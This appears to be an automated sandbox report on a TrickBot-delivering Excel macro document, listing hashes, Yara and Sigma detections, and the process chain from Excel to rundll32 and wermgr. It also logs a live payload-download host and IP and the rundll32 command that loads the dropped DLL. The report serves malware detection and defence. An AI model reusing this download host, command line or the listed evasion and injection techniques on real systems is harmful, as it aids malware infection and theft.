Loading ...

Play interactive tourEdit tour

Analysis Report SecuriteInfo.com.Exploit.Siggen3.10350.27303.xls

Overview

General Information

Sample Name:SecuriteInfo.com.Exploit.Siggen3.10350.27303.xls
Analysis ID:355599
MD5:ad9550ee6ece8322501ed92d374d3928
SHA1:d0617e5cb90b4db4fcf2269ffd8228b9ca4f89af
SHA256:74423c8236cd5057af8e4ffbf84fdcbb34f5e6dc8f8dc0520c685c7fd6bc100a

Most interesting Screenshot:

Detection

Hidden Macro 4.0 TrickBot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (drops PE files)
Found malicious Excel 4.0 Macro
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Trickbot
Allocates memory in foreign processes
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Abnormal high CPU Usage
Allocates a big amount of memory (probably used for heap spraying)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query network adapater information
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 1632 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • rundll32.exe (PID: 6332 cmdline: rundll32 ..\BASE.BABAA,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • wermgr.exe (PID: 3448 cmdline: C:\Windows\system32\wermgr.exe MD5: FF214585BF10206E21EA8EBA202FACFD)
      • wermgr.exe (PID: 2476 cmdline: C:\Windows\system32\wermgr.exe MD5: FF214585BF10206E21EA8EBA202FACFD)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
SecuriteInfo.com.Exploit.Siggen3.10350.27303.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x26ca2:$s1: Excel
  • 0x27d0a:$s1: Excel
  • 0x35b4:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000E.00000003.304386542.0000000000E7F000.00000004.00000001.sdmpJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security
    0000000E.00000002.308987556.0000000004840000.00000040.00000001.sdmpJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security
      0000000E.00000003.304304596.0000000004935000.00000004.00000001.sdmpJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security
        0000000E.00000002.309036588.00000000048D0000.00000004.00000001.sdmpJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security
          0000000E.00000003.304224445.0000000000E07000.00000004.00000001.sdmpJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security
            Click to see the 2 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            14.2.rundll32.exe.4840000.2.raw.unpackJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security
              14.2.rundll32.exe.4840000.2.unpackJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security

                Sigma Overview

                System Summary:

                barindex
                Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
                Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: rundll32 ..\BASE.BABAA,DllRegisterServer, CommandLine: rundll32 ..\BASE.BABAA,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 1632, ProcessCommandLine: rundll32 ..\BASE.BABAA,DllRegisterServer, ProcessId: 6332

                Signature Overview

                Click to jump to signature section

                Show All Signature Results

                AV Detection:

                barindex
                Multi AV Scanner detection for submitted fileShow sources
                Source: SecuriteInfo.com.Exploit.Siggen3.10350.27303.xlsVirustotal: Detection: 11%Perma Link
                Source: SecuriteInfo.com.Exploit.Siggen3.10350.27303.xlsReversingLabs: Detection: 23%

                Compliance:

                barindex
                Uses new MSVCR DllsShow sources
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
                Binary contains paths to debug symbolsShow sources
                Source: Binary string: F:\projects\cryptor_beta\Bin\Crypter\CrypterDllReleaseNoLogs\Win32\Crypter.pdb source: rundll32.exe, 0000000E.00000002.309993835.0000000067C19000.00000002.00020000.sdmp, BASE.BABAA.0.dr

                Software Vulnerabilities:

                barindex
                Document exploit detected (drops PE files)Show sources
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: 8[1].jjkes.0.drJump to dropped file
                Document exploit detected (UrlDownloadToFile)Show sources
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileA
                Document exploit detected (process start blacklist hit)Show sources
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe
                Source: excel.exeMemory has grown: Private usage: 1MB later: 106MB
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then inc dword ptr [esp+40h]
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then inc ecx
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then mov ebx, edx
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then cmp byte ptr [ecx+edx+01h], 00000000h
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then inc esp
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec ecx
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then inc esp
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then movzx ecx, word ptr [eax+02h]
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then movzx eax, byte ptr [ebx]
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then movzx edx, word ptr [eax]
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then movzx ebx, word ptr [eax]
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then inc edx
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
                Source: global trafficDNS query: name: www.chipmania.it
                Source: global trafficTCP traffic: 192.168.2.3:49708 -> 185.81.0.78:80
                Source: global trafficTCP traffic: 192.168.2.3:49708 -> 185.81.0.78:80
                Source: Joe Sandbox ViewIP Address: 185.81.0.78 185.81.0.78
                Source: global trafficHTTP traffic detected: GET /mails/open.php HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.chipmania.itConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /mails/open.php HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.chipmania.itConnection: Keep-Alive
                Source: unknownDNS traffic detected: queries for: www.chipmania.it
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://api.aadrm.com/
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://api.cortana.ai
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://api.diagnostics.office.com
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://api.microsoftstream.com/api/
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://api.office.net
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://api.onedrive.com
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://apis.live.net/v5.0/
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://augloop.office.com
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://augloop.office.com/v2
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://cdn.entity.
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://clients.config.office.net/
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://config.edge.skype.com
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://cortana.ai
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://cortana.ai/api
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://cr.office.com
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://dataservice.o365filtering.com
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://dataservice.o365filtering.com/
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://dev.cortana.ai
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://devnull.onenote.com
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://directory.services.
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://graph.ppe.windows.net
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://graph.ppe.windows.net/
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://graph.windows.net
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://graph.windows.net/
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://incidents.diagnostics.office.com
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://lifecycle.office.com
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://login.microsoftonline.com/
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://login.windows.local
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://management.azure.com
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://management.azure.com/
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://messaging.office.com/
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://ncus-000.contentsync.
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://ncus-000.pagecontentsync.
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://officeapps.live.com
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://onedrive.live.com
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://onedrive.live.com/embed?
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://outlook.office.com/
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://outlook.office365.com/
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://powerlift.acompli.net
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://settings.outlook.com
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://shell.suite.office.com:1443
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://skyapi.live.net/Activity/
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://staging.cortana.ai
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://store.office.cn/addinstemplate
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://store.office.com/addinstemplate
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://store.office.de/addinstemplate
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://tasks.office.com
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://templatelogging.office.com/client/log
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://web.microsoftstream.com/video/
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://webshell.suite.office.com
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://wus2-000.contentsync.
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://wus2-000.pagecontentsync.
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
                Source: 0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drString found in binary or memory: https://www.odwebp.svc.ms

                System Summary:

                barindex
                Found malicious Excel 4.0 MacroShow sources
                Source: SecuriteInfo.com.Exploit.Siggen3.10350.27303.xlsInitial sample: urlmon
